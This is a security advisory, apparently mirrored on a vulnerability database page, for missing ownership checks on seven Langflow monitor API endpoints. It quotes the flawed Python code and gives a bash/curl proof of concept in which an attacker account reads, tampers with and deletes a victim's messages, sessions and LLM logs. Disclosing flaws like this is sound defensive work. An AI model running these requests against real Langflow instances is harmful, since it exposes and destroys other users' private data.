GHSA-9C59-2MVC-VFR8

Vulnerability from github – Published: 2026-06-16 17:34 – Updated: 2026-06-16 17:34
VLAI
Summary
Langflow: IDOR/BOLA in Monitor API — Missing Ownership Enforcement on 7 Endpoints
Details

Summary

Langflow's /api/v1/monitor router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources — messages, sessions, build artifacts, and LLM transaction logs — without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user's data by supplying the target's resource ID or flow_id. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (monitor.py) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.

Details

Source file: src/backend/base/langflow/api/v1/monitor.py

The correct pattern (used only in GET /monitor/messages, lines 77–80):

stmt = select(MessageTable)
stmt = stmt.join(Flow, MessageTable.flow_id == Flow.id)
stmt = stmt.where(Flow.user_id == current_user.id)  # ownership enforced

All 7 vulnerable endpoints are missing this guard:

1. GET /api/v1/monitor/builds (lines 27–33) — reads build data for any flow_id:

@router.get("/builds", dependencies=[Depends(get_current_active_user)])
async def get_vertex_builds(flow_id: Annotated[UUID, Query()], session: DbSession):
    vertex_builds = await get_vertex_builds_by_flow_id(session, flow_id)  # no ownership check
    return VertexBuildMapModel.from_list_of_dicts(vertex_builds)

2. DELETE /api/v1/monitor/messages (lines 102–107) — deletes any message by UUID:

@router.delete("/messages", status_code=204, dependencies=[Depends(get_current_active_user)])
async def delete_messages(message_ids: list[UUID], session: DbSession):
    await session.exec(delete(MessageTable).where(MessageTable.id.in_(message_ids)))
    # message_ids accepted verbatim, no ownership check

3. PUT /api/v1/monitor/messages/{message_id} (lines 110–134) — overwrites any message:

db_message = await session.get(MessageTable, message_id)
# no check: db_message.flow_id → Flow.user_id == current_user.id
db_message.sqlmodel_update(message_dict)

4. PATCH /api/v1/monitor/messages/session/{old_session_id} (lines 137–171) — renames any session:

stmt = select(MessageTable).where(MessageTable.session_id == old_session_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id

5. DELETE /api/v1/monitor/messages/session/{session_id} (lines 174–188) — bulk-deletes any session:

await session.exec(
    delete(MessageTable).where(col(MessageTable.session_id) == session_id)
    # no ownership filter
)

6. GET /api/v1/monitor/transactions (lines 191–211) — reads LLM prompt/response logs for any flow_id:

stmt = select(TransactionTable).where(TransactionTable.flow_id == flow_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id

7. DELETE /api/v1/monitor/builds — deletes build records for any flow_id: Shares the same root cause as endpoint #1 (GET /builds): flow_id is accepted as a bare query parameter and passed to the deletion path without a WHERE Flow.user_id == current_user.id ownership check, so any authenticated user can destroy another user's build artifacts.

PoC

Tested on Langflow v1.7.3 (langflowai/langflow:1.7.3) with two accounts: langflow (victim) and attacker_test (attacker).

# Setup: authenticate both users
TOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login \
  -d "username=langflow&password=langflow" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")

ATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login \
  -d "username=attacker_test&password=Attacker123" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")

# Victim creates a flow (attacker only needs to know the flow_id — obtainable via brute force or enumeration)
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"name":"victim-flow","data":{"nodes":[],"edges":[]}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

# PoC 1: Read victim's LLM transaction logs (prompts + model responses)
curl -s "http://localhost:7860/api/v1/monitor/transactions?flow_id=$FLOW_ID" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200 — full transaction log returned including user prompts and model responses

# PoC 2: Read victim's build data
curl -s "http://localhost:7860/api/v1/monitor/builds?flow_id=$FLOW_ID" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200

# PoC 3: Delete victim's message (MESSAGE_ID obtained from transaction log above)
curl -s -X DELETE "http://localhost:7860/api/v1/monitor/messages" \
  -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
  -d '["<victim_message_id>"]'
# HTTP 204 — message deleted

# PoC 4: Tamper with victim's message content
curl -s -X PUT "http://localhost:7860/api/v1/monitor/messages/<victim_message_id>" \
  -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
  -d '{"text":"TAMPERED BY ATTACKER"}'
# HTTP 200 — message overwritten, "edit":true set

# PoC 5: Rename victim's session
curl -s -X PATCH \
  "http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new_session_id=attacker-controlled" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 200 — session renamed

# PoC 6: Bulk-delete victim's entire session
curl -s -X DELETE \
  "http://localhost:7860/api/v1/monitor/messages/session/victim-session-2" \
  -H "Authorization: Bearer $ATTKR"
# HTTP 204 — entire session deleted

All 6 demonstrated attack vectors confirmed (the 7th, DELETE /builds, shares the GET /builds root cause and was not separately scripted). After attacker operations: victim's message text read "TAMPERED BY ATTACKER", session renamed to attacker-controlled name, second session completely deleted.

Impact

This vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).

Confidentiality: GET /transactions exposes the full LLM conversation history — user-submitted prompts and model responses — for any flow by flow_id. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). GET /builds exposes internal workflow execution state.

Integrity: PUT /messages/{id} allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. PATCH /messages/session/{id} allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.

Availability: DELETE /messages and DELETE /messages/session/{id} enable permanent, irreversible destruction of another user's conversation history and LLM logs. No recovery mechanism exists once data is deleted.

Any registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user's data.

Severity
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33760"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T17:34:21Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nLangflow\u0027s `/api/v1/monitor` router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources \u2014 messages, sessions, build artifacts, and LLM transaction logs \u2014 without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user\u0027s data by supplying the target\u0027s resource ID or `flow_id`. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (`monitor.py`) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.\n\n\n### Details\n\n**Source file: `src/backend/base/langflow/api/v1/monitor.py`**\n\nThe correct pattern (used only in `GET /monitor/messages`, lines 77\u201380):\n```python\nstmt = select(MessageTable)\nstmt = stmt.join(Flow, MessageTable.flow_id == Flow.id)\nstmt = stmt.where(Flow.user_id == current_user.id)  # ownership enforced\n```\n\nAll 7 vulnerable endpoints are missing this guard:\n\n**1. `GET /api/v1/monitor/builds` (lines 27\u201333)** \u2014 reads build data for any `flow_id`:\n```python\n@router.get(\"/builds\", dependencies=[Depends(get_current_active_user)])\nasync def get_vertex_builds(flow_id: Annotated[UUID, Query()], session: DbSession):\n    vertex_builds = await get_vertex_builds_by_flow_id(session, flow_id)  # no ownership check\n    return VertexBuildMapModel.from_list_of_dicts(vertex_builds)\n```\n\n**2. `DELETE /api/v1/monitor/messages` (lines 102\u2013107)** \u2014 deletes any message by UUID:\n```python\n@router.delete(\"/messages\", status_code=204, dependencies=[Depends(get_current_active_user)])\nasync def delete_messages(message_ids: list[UUID], session: DbSession):\n    await session.exec(delete(MessageTable).where(MessageTable.id.in_(message_ids)))\n    # message_ids accepted verbatim, no ownership check\n```\n\n**3. `PUT /api/v1/monitor/messages/{message_id}` (lines 110\u2013134)** \u2014 overwrites any message:\n```python\ndb_message = await session.get(MessageTable, message_id)\n# no check: db_message.flow_id \u2192 Flow.user_id == current_user.id\ndb_message.sqlmodel_update(message_dict)\n```\n\n**4. `PATCH /api/v1/monitor/messages/session/{old_session_id}` (lines 137\u2013171)** \u2014 renames any session:\n```python\nstmt = select(MessageTable).where(MessageTable.session_id == old_session_id)\n# no JOIN to Flow, no WHERE Flow.user_id == current_user.id\n```\n\n**5. `DELETE /api/v1/monitor/messages/session/{session_id}` (lines 174\u2013188)** \u2014 bulk-deletes any session:\n```python\nawait session.exec(\n    delete(MessageTable).where(col(MessageTable.session_id) == session_id)\n    # no ownership filter\n)\n```\n\n**6. `GET /api/v1/monitor/transactions` (lines 191\u2013211)** \u2014 reads LLM prompt/response logs for any `flow_id`:\n```python\nstmt = select(TransactionTable).where(TransactionTable.flow_id == flow_id)\n# no JOIN to Flow, no WHERE Flow.user_id == current_user.id\n```\n\n**7. `DELETE /api/v1/monitor/builds`** \u2014 deletes build records for any `flow_id`:\nShares the same root cause as endpoint #1 (`GET /builds`): `flow_id` is accepted as a bare query parameter and passed to the deletion path without a `WHERE Flow.user_id == current_user.id` ownership check, so any authenticated user can destroy another user\u0027s build artifacts.\n\n### PoC\n\nTested on Langflow v1.7.3 (`langflowai/langflow:1.7.3`) with two accounts: `langflow` (victim) and `attacker_test` (attacker).\n\n```bash\n# Setup: authenticate both users\nTOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login \\\n  -d \"username=langflow\u0026password=langflow\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027access_token\u0027])\")\n\nATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login \\\n  -d \"username=attacker_test\u0026password=Attacker123\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027access_token\u0027])\")\n\n# Victim creates a flow (attacker only needs to know the flow_id \u2014 obtainable via brute force or enumeration)\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n  -H \"Authorization: Bearer $TOKEN\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"victim-flow\",\"data\":{\"nodes\":[],\"edges\":[]}}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027id\u0027])\")\n\n# PoC 1: Read victim\u0027s LLM transaction logs (prompts + model responses)\ncurl -s \"http://localhost:7860/api/v1/monitor/transactions?flow_id=$FLOW_ID\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200 \u2014 full transaction log returned including user prompts and model responses\n\n# PoC 2: Read victim\u0027s build data\ncurl -s \"http://localhost:7860/api/v1/monitor/builds?flow_id=$FLOW_ID\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200\n\n# PoC 3: Delete victim\u0027s message (MESSAGE_ID obtained from transaction log above)\ncurl -s -X DELETE \"http://localhost:7860/api/v1/monitor/messages\" \\\n  -H \"Authorization: Bearer $ATTKR\" -H \"Content-Type: application/json\" \\\n  -d \u0027[\"\u003cvictim_message_id\u003e\"]\u0027\n# HTTP 204 \u2014 message deleted\n\n# PoC 4: Tamper with victim\u0027s message content\ncurl -s -X PUT \"http://localhost:7860/api/v1/monitor/messages/\u003cvictim_message_id\u003e\" \\\n  -H \"Authorization: Bearer $ATTKR\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"text\":\"TAMPERED BY ATTACKER\"}\u0027\n# HTTP 200 \u2014 message overwritten, \"edit\":true set\n\n# PoC 5: Rename victim\u0027s session\ncurl -s -X PATCH \\\n  \"http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new_session_id=attacker-controlled\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 200 \u2014 session renamed\n\n# PoC 6: Bulk-delete victim\u0027s entire session\ncurl -s -X DELETE \\\n  \"http://localhost:7860/api/v1/monitor/messages/session/victim-session-2\" \\\n  -H \"Authorization: Bearer $ATTKR\"\n# HTTP 204 \u2014 entire session deleted\n```\n\nAll 6 demonstrated attack vectors confirmed (the 7th, `DELETE /builds`, shares the `GET /builds` root cause and was not separately scripted). After attacker operations: victim\u0027s message text read `\"TAMPERED BY ATTACKER\"`, session renamed to attacker-controlled name, second session completely deleted.\n\n### Impact\n\nThis vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).\n\n**Confidentiality:** `GET /transactions` exposes the full LLM conversation history \u2014 user-submitted prompts and model responses \u2014 for any flow by `flow_id`. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). `GET /builds` exposes internal workflow execution state.\n\n**Integrity:** `PUT /messages/{id}` allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. `PATCH /messages/session/{id}` allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.\n\n**Availability:** `DELETE /messages` and `DELETE /messages/session/{id}` enable permanent, irreversible destruction of another user\u0027s conversation history and LLM logs. No recovery mechanism exists once data is deleted.\n\nAny registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user\u0027s data.",
  "id": "GHSA-9c59-2mvc-vfr8",
  "modified": "2026-06-16T17:34:21Z",
  "published": "2026-06-16T17:34:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9c59-2mvc-vfr8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow: IDOR/BOLA in Monitor API \u2014 Missing Ownership Enforcement on 7 Endpoints "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.